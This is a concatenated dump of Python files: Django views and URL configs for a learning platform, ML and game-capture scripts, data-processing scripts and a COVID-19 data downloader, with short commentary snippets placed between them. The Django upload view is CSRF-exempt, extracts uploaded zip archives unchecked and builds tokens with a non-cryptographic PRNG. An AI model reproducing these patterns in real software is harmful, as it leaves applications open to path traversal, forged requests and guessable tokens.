request.user.is_authenticated():\n return redirect(\"/home/\")\n else:\n return render(request, \"register.html\",{'form': RegistrationForm(),'invite':invite})\n\n\ndef userlogin(request):\n if request.method == \"POST\":\n user = authenticate(username=request.POST['username'],\n password=request.POST['password'])\n if user is not None:\n if user.is_active:\n login(request, user)\n info(request, \"Welcome back\")\n return redirect(\"/home/\")\n\n else:\n info(request, \"User is not active\")\n return redirect(\"/login/\")\n\n else:\n error(request, \"There was an error with your username/password\")\n return redirect(\"/login/\")\n\n else:\n form = UserForm()\n return render(request, \"login.html\", {'LoginForm': form})\n\n\n@csrf_exempt\n@login_required\ndef content_mgmt(request):\n\n if request.method == \"POST\":\n if request.POST[\"action\"] == \"delete\":\n Modules.objects.filter(name=request.POST[\"item\"]).delete()\n info(request, \"Module Deleted\")\n return redirect(\"/home/\")\n\n elif request.POST[\"action\"] == \"publish\":\n mod = Modules.objects.get(name=request.POST[\"item\"])\n\n if mod.published:\n mod.published = False\n info(request, \"Module Unpublished\")\n\n else:\n mod.published = True\n info(request, \"Module Published\")\n\n mod.save()\n\n return redirect(\"/home/\")\n\n elif request.POST[\"action\"] == \"upload\":\n\n if request.FILES[\"module\"]:\n uploadedfile = request.FILES[\"module\"]\n 
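# random_auth_token above draws from random.choice, which is backed by a
# non-cryptographic PRNG; a modern equivalent (an alternative sketch, not
# the original code) would use the secrets module instead:
import secrets
import string

ALPHABET = string.ascii_letters + string.digits

def random_auth_token_sketch(length=64):
    return ''.join(secrets.choice(ALPHABET) for _ in range(length))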
module_dir = \"modules/\"\n ext = uploadedfile.name.split(\".\")\n storage = generator.id_generator(size=16)\n upload_dir = os.path.join(module_dir,storage,uploadedfile.name)\n fs = FileSystemStorage()\n fs.save(upload_dir, uploadedfile)\n\n if ext[1:len(ext)][0] == \"zip\" and os.path.isfile(upload_dir):\n zip_ref = zipfile.ZipFile(upload_dir,\"r\")\n zip_ref.extractall(os.path.join(settings.MEDIA_ROOT,module_dir,storage,'store'))\n zip_ref.close()\n\n if not request.POST['name']:\n module_name = ext[0]\n\n else:\n module_name = request.POST['name']\n\n Modules(name=module_name,\n description=request.POST['description'],\n owner=request.user.username,\n storage=storage,\n module=uploadedfile.name)\n\n info(request, \"Module Uploaded\")\n return redirect(\"/home/\")\n\n else:\n return redirect(\"/home/\")\n\n\n@login_required\ndef home(request):\n\n modules = Modules.objects.all()\n personal_stats = ModulesStatus.objects.filter(user=request.user.id)\n return render(request, \"home.html\", {\"modules\": modules,\n \"pstats\":personal_stats,})\n\n\n@login_required\ndef manage(request):\n\n if request.method == \"POST\":\n\n if request.POST.get('staff'):\n staff = True\n\n else:\n staff = False\n\n\n # TODO: move invite code stuff from models\n invite = InviteCode().create_code(leader=request.user,\n email=request.POST['email'],\n staff=staff)\n\n # send invite email.\n message = \"\"\"\n # email/invite not working yet\n Good Day,\n You've been invited to use the Daimlier Learning Platform\n\n http://localhost:8000/register/%s\n\n Cheers,\n The DLP Team\n \"\"\" % invite\n\n info(request, message)\n return redirect(\"/manage\")\n\n\n total_invites = InviteCode.objects.all()\n pending_invites = total_invites.filter(active=True)\n team_all_invites = total_invites.filter(leader=request.user)\n team_pending_invites = total_invites.filter(active=True, leader=request.user)\n\n # superusers can see all teams.\n current_team = UserProfile.objects.filter(team=request.user)\n\n module_all = Modules.objects.filter(published=True)\n module_status = ModulesStatus.objects.all()\n\n dasstats = []\n for a in module_all:\n if a.published:\n for b in module_status:\n if a.id == b.module_id:\n dasstats.append({\"user_id\":b.user_id,\"status\":b.status,\"module\":a,\"dtg\":b.dtg})\n\n\n return render(request, \"manage.html\", {\"total_invites\":total_invites,\n \"pending_invites\":pending_invites,\n \"team_pending_invites\":team_pending_invites,\n \"team_all_invites\":team_all_invites,\n \"current_team\":current_team,\n \"module_status\":module_status,\n \"dasstats\":dasstats,\n \"modules\":module_all})\n\n\n\n\n@login_required\ndef module(request, storage=None):\n\n try:\n current_module = Modules.objects.get(storage=storage)\n if not ModulesStatus.objects.filter(user=request.user,module=current_module):\n ModulesStatus(user=request.user,\n module=current_module,\n status=\"started\").save()\n\n return render(request, \"module.html\", {\"module\": current_module})\n\n except:\n info(request, \"There was an error with your request\")\n return redirect(\"/home/\")\n\n\n\n@login_required\ndef profile(request):\n\n if request.method == \"POST\":\n current_user = User.objects.get(username=request.user.username)\n current_user.email = request.POST['email']\n current_user.first_name = request.POST['firstname']\n current_user.last_name = request.POST['lastname']\n current_user.save()\n info(request, \"Profile Updated\")\n return redirect('/profile')\n\n else:\n return render(request, 
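# The upload branch above extracts user-supplied zip archives with
# extractall; a common hardening step (assumed here, not in the original
# view) rejects members whose resolved paths escape the destination:
import os
import zipfile

def safe_extract(archive_path, dest_dir):
    root = os.path.realpath(dest_dir)
    with zipfile.ZipFile(archive_path) as zf:
        for member in zf.namelist():
            target = os.path.realpath(os.path.join(dest_dir, member))
            if target != root and not target.startswith(root + os.sep):
                raise ValueError('unsafe path in archive: %s' % member)
        zf.extractall(dest_dir)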
\"profile.html\")\n\n\n@login_required\ndef userlogout(request):\n\n logout(request)\n return redirect(\"/home/\")\n\n\n@login_required\ndef message(request, message_id=None):\n\n myprofile = UserProfile.objects.get(user=request.user)\n board = MessageBoard.objects.filter(team=myprofile.team, parent=0).order_by(\"-id\")\n board_views = MessageViews.objects.filter(user=request.user)\n\n if request.method == \"POST\":\n\n try:\n\n MessageBoard(body=request.POST[\"body\"],\n author=request.user,\n parent=request.POST[\"parent\"],\n team=myprofile.team).save()\n\n info(request,\"beta message\")\n return redirect(\"/message/\" + request.POST[\"parent\"])\n except:\n MessageBoard(title=request.POST[\"title\"],\n body=request.POST[\"body\"],\n author=request.user,\n parent=0,\n team=myprofile.team).save()\n info(request, \"Message Posted\")\n return redirect(\"/message/\")\n\n\n if message_id:\n try:\n payload = MessageBoard.objects.get(id=message_id)\n payload_reply = MessageBoard.objects.filter(parent=message_id)\n if not MessageViews.objects.filter(message=payload, user=request.user, data=\"view\"):\n MessageViews(message=payload, user=request.user, data=\"view\").save()\n except:\n info(request, \"There was a problem with your request\")\n return redirect(\"/message/\")\n\n else:\n payload=None\n payload_reply=None\n\n return render(request, \"message.html\", {\"board\":board,\n \"views\":board_views,\n \"payload\":payload,\n \"payload_reply\":payload_reply})\n\n\n","sub_path":"playground/dlp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"330007511","text":"import glob\nimport os\nimport sys\nimport time\n\nimport numpy as np\nimport tensorboardX as tb\nimport torch\nimport torch.optim as optim\nimport os\nimport utils.timer\nfrom datasets.dataTools.test_data_loader import DataLoader\nfrom options.config import cfg\nfrom options.options import opt\nfrom PIL import Image\n\ntry:\n import cPickle as pickle\nexcept ImportError:\n import pickle\n\n\nclass SolverWrapper(object):\n \"\"\"\n A wrapper class for the training process\n \"\"\"\n\n def __init__(self, network, vidb, bsdb, model_path):\n self.net = network\n self.vidb = vidb\n self.bsdb = bsdb\n self.bsdb_len = len(self.bsdb)\n self.model_path = model_path\n\n def construct_graph(self):\n torch.manual_seed(cfg.RNG_SEED)\n self.net.init_modules(self.vidb.num_classes)\n\n def initialize(self):\n \"\"\"\n 初始化参数\n \"\"\"\n self.net.load_state_dict(torch.load(str(self.model_path)))\n\n def test_model(self):\n self.data_loader = DataLoader(self.bsdb, self.vidb.num_classes, cfg.PIXEL_MEAN, num_kernel=cfg.KERNEL_NUM,\n image_size=cfg.IMAGE_SIZE, frame_jump=opt.frame_jump)\n # Construct the computation graph\n self.construct_graph()\n\n self.initialize()\n\n self.net.eval()\n self.net.to(self.net.device)\n acc = 0\n for i in range(0, self.bsdb_len):\n frames, classes = self.data_loader.set_index(i)\n labels = torch.Tensor().long().to(self.net._device)\n print(i)\n for j in range(0, int(frames//(1.5)), 2):\n test_batch, test_label, test_class = self.data_loader.forward(j)\n label = self.net.test(test_batch, test_label, test_class)\n labels = torch.cat([labels, label], dim=0)\n label, is_true = get_true_label(labels, classes)\n if is_true:\n acc += 1\n print(\"Computed label : {}, Real Label : {}\".format(\n self.vidb._ind_to_class[label], self.vidb._ind_to_class[classes]))\n acc_ = acc / self.bsdb_len\n print('Test 
accuracy: %.6f' % (acc_))\n\n\ndef get_true_label(labels, real_label):\n \"\"\" \n labels 每一帧 判断出来的label Tensor\n real_label 真实标签\n \"\"\"\n labels_np = labels.cpu().numpy()\n label = np.argmax(np.bincount(labels_np))\n is_true = True if label == real_label else False\n return label, is_true\n\n\ndef get_bsdb_from_vidb(vidb):\n return vidb.bsdb\n\n\ndef test_net(network, vidb, bsdb, model_path):\n \"\"\"Train network\"\"\"\n sw = SolverWrapper(network, vidb, bsdb, model_path)\n # 准备训练\n sw.test_model()\n","sub_path":"model/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"430389942","text":"import capture\nimport images\nimport pickle\nimport dino.score as score\nimport numpy as np\nimport reduction\n\n\nclass RawGameCapturer(capture.Capture):\n def __init__(self, reduction_factor_x=1, reduction_factor_y=None):\n \"\"\"Capture the whole game environment.\"\"\"\n self.reduction_factor_x = reduction_factor_x\n self.reduction_factor_y = reduction_factor_y or reduction_factor_x\n self.capturer = capture.ScreenRegion(664, 173, 593, 102)\n\n def capture(self):\n \"\"\"Capture the game environment.\"\"\"\n return images.greyscale(self.capturer.capture())[\n :: self.reduction_factor_x, :: self.reduction_factor_y\n ]\n\n\ndef collect_raw_footage(backlog_size=10):\n \"\"\"Collect raw images of the game being played.\"\"\"\n backlog = capture.CaptureBacklog(\n capture.CaptureGroup(score=score.ScoreCapturer(2), game=RawGameCapturer(4)), 20\n )\n key_capturer = capture.KeyState(\"up\")\n frames = []\n\n try:\n while True:\n await_game_start(key_capturer)\n await_game_finish(frames, backlog)\n except KeyboardInterrupt:\n save_raw_footage([frame[\"game\"] for frame in frames])\n return None\n\n\ndef get_raw_footage_location():\n \"\"\"Return the location of the raw footage save file.\"\"\"\n return \"data/raw_frames.obj\"\n\n\ndef save_raw_footage(frames):\n \"\"\"Saves raw footage as a tensor under data/raw_frames.obj.\"\"\"\n file_handler = open(get_raw_footage_location(), \"wb\")\n numpy_frames = np.array(frames)\n pickle.dump(np.reshape(numpy_frames, [numpy_frames.shape[0], -1]), file_handler)\n file_handler.close()\n\n\ndef load_raw_frames():\n \"\"\"Load the numpy array containing the raw game frames.\"\"\"\n file_handler = open(get_raw_footage_location(), \"rb\")\n object = pickle.load(file_handler)\n file_handler.close()\n return object\n\n\ndef await_game_start(up_capturer):\n \"\"\"Wait until the game starts, and then return.\"\"\"\n while True:\n if up_capturer.capture():\n print(\"Game started.\")\n return None\n\n\ndef await_game_finish(frames, backlog):\n \"\"\"Wait for the game to finish, recording frames while doing so.\"\"\"\n while True:\n frames.append(backlog.update())\n if backlog.full:\n mean = np.mean(np.square(backlog.at(0)[\"game\"] - backlog.at(-1)[\"game\"]))\n if mean == 0.0:\n print(\"Game finished.\")\n return None\n\n\ndef create_autoencoder(name, latent_dimension, layers):\n \"\"\"Create an autoencoder for compressing game frames.\"\"\"\n autoencoder = reduction.make_mirrored_autoencoder(\n 26 * 149, latent_dimension, layers\n )\n reduction.save_autoencoder(autoencoder, name)\n\n\ndef load_autoencoder(name):\n \"\"\"Load an autoencoder and compile it for training.\"\"\"\n autoencoder = reduction.load_autoencoder(name)\n return autoencoder\n\n\ndef format_frame_vector(frame):\n \"\"\"Format a frame vector into a matrix so it can be 
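# save_raw_footage flattens each captured frame into a row vector and
# format_frame_vector undoes it; the reshape pair on its own (26x149 is
# the reduced frame size used in this module):
import numpy as np

frames = np.zeros((10, 26, 149))            # 10 greyscale game frames
flat = frames.reshape(frames.shape[0], -1)  # (10, 3874): one row per frame
restored = flat[0].reshape(26, 149)         # back to an image for display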
displayed.\"\"\"\n return np.reshape(frame, (26, 149))\n\n\nsave_autoencoder = reduction.save_autoencoder\n","sub_path":"dino/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"425992384","text":"# -*- coding: utf-8 -*-\n'''\n@Time : 2017/5/2 17:20\n\n@author: song\n'''\nimport pandas as pd\nimport time\nexcel_data=pd.read_table('D:/2015seeds.csv',sep=',')\n\ndef exp01(data1):\n '''\n 对单条数据进行展开\n \n :param data1: eg:['island11','A','T1',15,81]\n :return: 展开结果 eg : [island11, A, T1 ,1]\n '''\n tl1=list(data1[0:3])\n tl2 = list(data1[0:3])\n\n ##展开为0的项,如果数量为零返回空列表\n if data1[3] !=0:\n\n tl1.append('1')\n list1=[tl1]*data1[3]\n # print list1\n else:\n list1=[]\n ##展开为1的项,如果数量为零返回空列表\n if data1[4] !=0:\n tl2.append('0')\n list2 = [tl2] * data1[4]\n # print list2\n else:\n list2=[]\n ## 合并0和1列表\n flist=list1+list2\n return flist\n\ndef trans01(data):\n '''\n 对每一行数据展开\n \n :param data: excel原数据\n :return: excel展开结果\n '''\n tlist=[]\n for i in data.values:\n # print i\n tlist+=exp01(i)\n\n ##先生成列表,再将列表转化为数据框\n fDF=pd.DataFrame(tlist)\n return fDF\n\n\nxx= trans01(excel_data)\n# print xx\n# print xx[xx[2]=='T1']\n\nxx.to_csv('D:/2015seedsexp.csv')\n\n\n","sub_path":"othersthings/doexcel.py","file_name":"doexcel.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"598058095","text":"#!/usr/bin/env python\nimport shutil\nfrom os import path\nimport sys\nimport csv\n\nimport yaml\n\nFILES = ('ships.csv',)\n\ndef build_navalbattles(src, dst):\n filename = path.join(src, \"rawdata\", \"ships\", \"ships_in_battles.yaml\")\n with open(filename, \"r\") as f:\n data = yaml.load(f)\n battles = []\n for battle in data:\n confederate_ships = len(battle['Confederate'])\n us_ships = len(battle['US'])\n us_fortifications = 'US' in battle['fortifications']\n confederate_fortifications = 'Confederate' in battle['fortifications']\n btl = {'cwsac_id': battle['cwsac_id'],\n 'confederate_ships': confederate_ships,\n 'us_ships': us_ships,\n 'confederate_fortifications': confederate_fortifications,\n 'us_fortifications': confederate_fortifications}\n battles.append(btl)\n dstfile = path.join(dst, 'navalbattles.csv')\n with open(dstfile, 'w') as f:\n print(\"Writing: %s\" % dstfile)\n fieldnames = ('cwsac_id',\n 'confederate_ships',\n 'us_ships',\n 'confederate_fortifications',\n 'us_fortifications')\n writer = csv.DictWriter(f, fieldnames)\n writer.writeheader()\n writer.writerows(battles)\n\n\ndef build_ships_in_battles(src, dst):\n filename = path.join(src, \"rawdata\", \"ships\", \"ships_in_battles.yaml\")\n with open(filename, \"r\") as f:\n data = yaml.load(f)\n ships = []\n for battle in data:\n for belligerent in ('Confederate', 'US'):\n try:\n for ship in battle[belligerent]:\n ships.append({'cwsac_id': battle['cwsac_id'],\n 'belligerent': belligerent,\n 'ship': ship})\n except KeyError:\n pass\n dstfile = path.join(dst, 'ships_in_battles.csv')\n with open(dstfile, 'w') as f:\n print(\"Writing: %s\" % dstfile)\n fieldnames = ('cwsac_id', 'belligerent', 'ship')\n writer = csv.DictWriter(f, fieldnames)\n writer.writeheader()\n writer.writerows(ships)\n\ndef copyfiles(src, dst):\n for fn in FILES:\n srcfile = path.join(src, \"rawdata\", \"ships\", fn)\n dstfile = path.join(dst, fn)\n print(\"Writing: %s\" % dstfile)\n shutil.copy(srcfile, dstfile)\n\ndef main():\n src = sys.argv[1]\n dst = 
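# doexcel.py above expands aggregated counts back into one row per seed; an
# equivalent vectorised sketch with Index.repeat (an alternative to the
# row-by-row loop, not the original approach; column names illustrative):
import pandas as pd

df = pd.DataFrame({'island': ['island11'], 'plot': ['A'],
                   'ones': [2], 'zeros': [1]})
expanded = pd.concat([
    df.loc[df.index.repeat(df['ones'])].assign(flag='1'),
    df.loc[df.index.repeat(df['zeros'])].assign(flag='0'),
], ignore_index=True).drop(columns=['ones', 'zeros'])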
sys.argv[2]\n print(\"Building ships data\")\n copyfiles(src, dst)\n build_ships_in_battles(src, dst)\n build_navalbattles(src, dst)\n\nif __name__ == '__main__':\n main()\n","sub_path":"bin/build_ships.py","file_name":"build_ships.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"225332704","text":"from django.conf.urls import url\nfrom . import views\n\napp_name='devices'\n\nurlpatterns = [\n #/devices/ ---homepage\n url(r'^$', views.index,name='index'),\n #/devices/home/\n url(r'^home/$',views.home,name='home'),\n #/devices/aboutus/\n url(r'^about_us/$',views.about_us,name='about_us'),\n #/devices/retpolicy/\n url(r'^retpolicy/$',views.returnpolicy,name='returnpolicy'),\n\n #/devices/support/\nurl(r'^support/$',views.support,name='support'),\n\n#/devices/credits/\nurl(r'^credit/$',views.credit,name='credit'),\n #/devices/homeres/\n url(r'^homeres/$',views.homeres,name='homeres'),\n #/devices/map/\n url(r'^map/$',views.mymap,name='mymap'),\n #/devices/mail/\n url(r'^mail/$',views.mailsend,name='mailsend'),\n\n #/devices/register/\n url(r'^register/$',views.register,name='register'),\n #/devices/update/\n url(r'^update/$',views.update,name='update'),\n\n #/devices/delitem/\n url(r'^delitem1/$',views.delete1,name='delete1'),\n #/devices/delitem/\n url(r'^delitem2/$',views.delete2,name='delete2'),\n #/devices/delitem/\n url(r'^delitem3/$',views.delete3,name='delete3'),\n\n #/devices/addressreg/\n url(r'^addressreg/$',views.addressreg,name='addressreg'),\n #/devices/login_user/\n url(r'^login_user/$',views.login_user,name='login_user'),\n #/devices/logout_user/\n url(r'^logout_user/$',views.logout_user,name='logout_user'),\n\n #/devices/oneplus/\n url(r'^oneplus/$',views.liop,name='liop'),\n #/devices/oneplus/1/\n url(r'^oneplus/(?P[0-9]+)/$',views.opde,name='opde'),\n #/devices/oneplus/1/buy/\n url(r'^oneplus/(?P[0-9]+)/buy/$',views.opbuy,name='opbuy'),\n #devices/outofstock/compname/modelname/\n url(r'^outofstock/(?P[A-Za-z0-9 ]+)/(?P[A-Za-z0-9 ]+)/$',views.outofstock,name='outofstock'),\n #devices/placeorder/comp_name/model_name/\n url(r'^placeorder/(?P[A-Za-z0-9 ]+)/(?P[A-Za-z0-9 ]+)/$',views.placeorder,name='placeorder'),\n #/devices/xiaomi/\n url(r'^xiaomi/$',views.limi,name='limi'),\n #/devices/xiaomi/1/\n url(r'^xiaomi/(?P[0-9]+)/$',views.mide,name='mide'),\n #/devices/xiaomi/1/buy/\n url(r'^xiaomi/(?P[0-9]+)/buy/$',views.mibuy,name='mibuy'),\n\n #/devices/samsung/\n url(r'^samsung/$',views.liss,name='liss'),\n #/devices/samsung/1/\n url(r'^samsung/(?P[0-9]+)/$',views.ssde,name='ssde'),\n #/devices/samsung/1/buy/\n url(r'^samsung/(?P[0-9]+)/buy/$',views.ssbuy,name='ssbuy'),\n\n #/devices/leonovo/\n url(r'^lenovo/$',views.lilen,name='lilen'),\n #/devices/lenovo/1/\n url(r'^lenovo/(?P[0-9]+)/$',views.lende,name='lende'),\n #/devices/lenovo/1/buy/\n url(r'^lenovo/(?P[0-9]+)/buy/$',views.lenbuy,name='lenbuy'),\n\n #/devices/google/\n url(r'^google/$',views.ligo,name='ligo'),\n #/devices/google/1/\n url(r'^google/(?P[0-9]+)/$',views.gode,name='gode'),\n #/devices/google/1/buy/\n url(r'^google/(?P[0-9]+)/buy/$',views.gobuy,name='gobuy'),\n\n #/devices/sony/\n url(r'^sony/$',views.lison,name='lison'),\n #/devices/sony/1/\n url(r'^sony/(?P[0-9]+)/$',views.sonde,name='sonde'),\n #/devices/sony/1/buy/\n url(r'^sony/(?P[0-9]+)/buy/$',views.sonbuy,name='sonbuy'),\n\n\n #/devices/apple/\n url(r'^apple/$',views.liap,name='liap'),\n #/devices/apple/1/\n 
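# Both build_* helpers above serialise a list of dicts through
# csv.DictWriter; the minimal pattern they share (row values illustrative):
import csv

rows = [{'cwsac_id': 'XX000', 'us_ships': 2, 'confederate_ships': 1}]
with open('navalbattles.csv', 'w') as f:
    writer = csv.DictWriter(f, ('cwsac_id', 'us_ships', 'confederate_ships'))
    writer.writeheader()
    writer.writerows(rows)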
url(r'^apple/(?P[0-9]+)/$',views.apde,name='apde'),\n #/devices/apple/1/buy/\n url(r'^apple/(?P[0-9]+)/buy/$',views.apbuy,name='apbuy'),\n\n #/devices/moto/\n url(r'^moto/$',views.limo,name='limo'),\n #/devices/moto/1/\n url(r'^moto/(?P[0-9]+)/$',views.mode,name='mode'),\n #/devices/moto/1/buy/\n url(r'^moto/(?P[0-9]+)/buy/$',views.mobuy,name='mobuy'),\n\n #/devices/lg/\n url(r'^lg/$',views.lilg,name='lilg'),\n #/devices/lg/1/\n url(r'^lg/(?P[0-9]+)/$',views.lgde,name='lgde'),\n #/devices/lg/1/buy/\n url(r'^lg/(?P[0-9]+)/buy/$',views.lgbuy,name='lgbuy'),\n\n\n#/devices/asus/\nurl(r'^asus/$',views.lias,name='lias'),\n#/devices/asus/1/\nurl(r'^asus/(?P[0-9]+)/$',views.asde,name='asde'),\n #/devices/asus/1/buy/\n url(r'^asus/(?P[0-9]+)/buy/$',views.asbuy,name='asbuy'),\n\n #/devices/cartdetails/\n url(r'^cartdetails/$',views.cartdetails,name='cartdetails'),\n #/music/712/----712-(album_id)\n url(r'^(?P[0-9]+)/$',views.detail,name='detail'),\n\n #/music/')\n\toutput.append(':')\n\tfor x in soup.find_all('div', {'class': \"field-name-field-skladniki\"}):\n\t\tfor y in x.find_all('li'):\n\t\t\toutput.append(y.text.strip())\n\n\toutput.append('')\n\tfor x in soup.find_all('div', {'class': \"field-name-field-przygotowanie\"}):\n\t\tfor y in x.find_all('li'):\n\t\t\toutput.append(y.text.strip())\n\n\toutput.append('')\n\treturn output\n\ndef dump_array(array, file):\n\twith open(file, \"a\") as text_file:\n\t\tfor line in array:\n\t\t\tprint(line, file=text_file)\n\n\nif __name__ == '__main__':\n\tfor index, href in enumerate(get_all_links()):\n\t\tprint ('{} {}'.format(index, href))\n\t\tdump_array(scrap(href), 'input.txt')\n\n\n","sub_path":"scrapers/kwestiasmaku/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"479870981","text":"from django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('', Home),\n path('blog/', Blog),\n path('blog/input/', inputblog, name='inputblog'),\n path('mentor/', mentor),\n path('mentor/input/', inputmentor, name='inputmentor'),\n path('mentee/', mentee),\n path('mentee/input/', inputmentee, name='inputmentee'),\n path('author/', Author),\n\n]","sub_path":"Home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"535049420","text":"N, M = map(int, input().split())\n\ncase = [i for i in range(1, N+1)]\ndisk = []\nfor _ in range(M):\n disk.append(int(input()))\n\nnow = 0\nfor d in disk:\n if d == now:\n continue\n i = case.index(d)\n tmp = case[i]\n case[i] = now\n now = tmp\n\nfor c in case:\n print(c)\n","sub_path":"ARC_B/ARC007_B.py","file_name":"ARC007_B.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"387774489","text":"#Module to download data files containing COVID19 data, cleaning and\r\n#organising data and writing cleaned data to a database file.\r\n\r\n#This module(when executed) also replaces the downloaded files with new file from net\r\n#which are older than 2 days\r\n\r\n#Part of Project: COVID19 Statstics\\Visualisation\r\n\r\n\r\n#https://covid19.who.int/WHO-COVID-19-global-data.csv\r\n#https://covid.ourworldindata.org/data/owid-covid-data.csv\r\n#https://api.covid19india.org/data.json\r\n#https://api.covid19india.org/states_daily.json\r\n\r\nimport requests\r\nfrom datetime import *\r\nfrom 
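# The (?P[0-9]+) patterns in the routes above are Django named capture
# groups, normally written (?P<name>...) so the match is passed to the view
# as a keyword argument; the regex mechanism in isolation (the group name
# here is hypothetical):
import re

m = re.match(r'^oneplus/(?P<pk>[0-9]+)/$', 'oneplus/3/')
assert m.group('pk') == '3'  # Django would call views.opde(request, pk='3')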
pathlib import Path\r\nimport os\r\nimport platform\r\nimport pickle\r\nimport pandas as pd\r\nimport numpy as np\r\nimport json\r\nimport matplotlib.pyplot as plt\r\nfrom sqlalchemy import create_engine\r\nimport traceback\r\n\r\n#Setting pandas options for debugging\\output to shell \r\npd.set_option('display.max_columns', None)\r\npd.set_option('display.max_rows', None)\r\n\r\n#List of file names downloaded from internet and used for making\r\n#pandas DataFrame objects\r\nfiles = [\r\n 'covid19_global_data.csv',\r\n 'states_daily.json',\r\n 'states_total.json'\r\n ]\r\n\r\n#List of download urls\r\nurls = [\r\n 'https://covid.ourworldindata.org/data/owid-covid-data.csv',\r\n 'https://api.covid19india.org/states_daily.json',\r\n 'https://api.covid19india.org/data.json'\r\n ]\r\n\r\n#Flag to check if files are downloaded or not\r\ndownload = False\r\n\r\ndef update_covid19_database():\r\n #List of file names downloaded from internet and used for making\r\n #pandas DataFrame objects\r\n files = [\r\n 'covid19_global_data.csv',\r\n 'states_daily.json',\r\n 'states_total.json'\r\n ]\r\n\r\n #List of download urls\r\n urls = [\r\n 'https://covid.ourworldindata.org/data/owid-covid-data.csv',\r\n 'https://api.covid19india.org/states_daily.json',\r\n 'https://api.covid19india.org/data.json'\r\n ]\r\n\r\n #Flag to check if files are downloaded or not\r\n download = False\r\n\r\n for file, url in zip(files, urls):\r\n #Creating neccessary file paths and data directory\r\n my_file = Path('.\\\\data\\\\'+file)\r\n my_file.parent.mkdir(exist_ok=True)\r\n directory = '.\\\\data\\\\'\r\n\r\n\r\n #Check if file already exists\r\n if my_file.is_file():\r\n\r\n file_mtime = datetime.fromtimestamp(os.stat(my_file)[-2]) #file modify time\r\n now = datetime.now()\r\n\r\n time_elapsed = now - file_mtime\r\n\r\n #Execute this block if file does not exist or file is older than 2 days\r\n if not my_file.is_file() or now.day > file_mtime.day: #time_elapsed > timedelta(hours=23):\r\n try:\r\n response = requests.get(url)\r\n response.raise_for_status() # Check that the request was successful\r\n\r\n download = True\r\n\r\n with open(my_file, \"wb\") as f:\r\n f.write(response.content)\r\n\r\n except requests.exceptions.HTTPError:\r\n status = 'Invalid URL'\r\n last_update = file_mtime\r\n return status, last_update\r\n except requests.exceptions.ConnectionError:\r\n status = 'Unable to Connect to Internet'\r\n last_update = file_mtime\r\n return status, last_update\r\n except requests.exceptions.Timeout:\r\n status = 'Connection Timeout'\r\n last_update = file_mtime\r\n return status, last_update\r\n except requests.exceptions.RequestException:\r\n status = 'Unknown'\r\n last_update = file_mtime\r\n return status, last_update\r\n \r\n if download is False:\r\n status = 'No download'\r\n last_update = file_mtime\r\n return status, last_update\r\n\r\n if download:\r\n \r\n #Defining df containing data of all countries (Aggregate)\r\n parent_df = pd.read_csv(directory+'covid19_global_data.csv',\r\n header=0,\r\n #index_col=['location', 'date'],\r\n #nrows=70,\r\n usecols=['iso_code', 'continent', 'location',\r\n 'date', 'total_cases', 'new_cases',\r\n 'total_deaths', 'new_deaths',\r\n 'new_tests', 'total_tests',\r\n 'tests_per_case', 'positive_rate',\r\n 'population',\r\n 'population_density'],\r\n parse_dates=['date']\r\n )\r\n\r\n #Cleaning and organising parent_df\r\n i = parent_df[parent_df.location=='International'].index\r\n parent_df.drop(i, inplace=True)\r\n\r\n parent_df = 
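# update_covid19_database below refreshes a file only when the on-disk copy
# is stale; it compares day-of-month and keeps a timedelta cutoff in a
# comment. The staleness test written out with that cutoff, in isolation:
from datetime import datetime, timedelta
from pathlib import Path

def is_stale(path, max_age=timedelta(hours=23)):
    p = Path(path)
    if not p.is_file():
        return True
    mtime = datetime.fromtimestamp(p.stat().st_mtime)
    return datetime.now() - mtime > max_age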
parent_df.fillna(value={'total_cases':0, 'new_cases':0,\r\n 'total_deaths':0, 'new_deaths':0,\r\n 'new_tests':0, 'total_tests':0,\r\n 'tests_per_case':0, 'positive_rate':0,\r\n 'population':0, 'population_density':0,\r\n 'continent':'Global'}\r\n )\r\n\r\n parent_df = parent_df.astype(dtype={'iso_code':'string', 'continent':'string',\r\n 'location':'string', 'total_cases':'int64',\r\n 'new_cases':'int64', 'total_deaths':'int64',\r\n 'new_deaths':'int64', 'new_tests':'int64',\r\n 'total_tests':'int64',\r\n 'tests_per_case':'float64',\r\n 'positive_rate':'float64',\r\n 'population':'int64',\r\n 'population_density':'float64'}\r\n )\r\n\r\n parent_df.rename(columns={'location':'country'}, inplace=True)\r\n\r\n\r\n #Defining df containing data of all states of India (Daily)\r\n with open(directory+'states_daily.json', mode='r') as fp:\r\n dict_india = json.load(fp) \r\n\r\n india_df = pd.DataFrame(dict_india['states_daily'])\r\n india_df.drop(columns='dateymd', inplace=True)\r\n\r\n #Cleaning and organising india_df\r\n india_df = india_df.melt(id_vars=['date','status'])\r\n\r\n india_df = pd.pivot_table(india_df,values='value',\r\n index=['date','variable'],\r\n columns=['status'], aggfunc=np.sum)\r\n\r\n india_df.reset_index(inplace=True)\r\n india_df['date']= pd.to_datetime(india_df['date'])\r\n india_df.sort_values(by=['variable', 'date'], inplace=True)\r\n india_df.columns.name = None\r\n india_df.reset_index(drop=True, inplace=True)\r\n\r\n india_df.rename(columns={'variable':'state',\r\n 'Confirmed':'confirmed',\r\n 'Deceased':'deceased',\r\n 'Recovered':'recovered'},\r\n inplace=True)\r\n\r\n india_df = india_df.astype(dtype={'state':'string',\r\n 'confirmed':'int64',\r\n 'deceased':'int64',\r\n 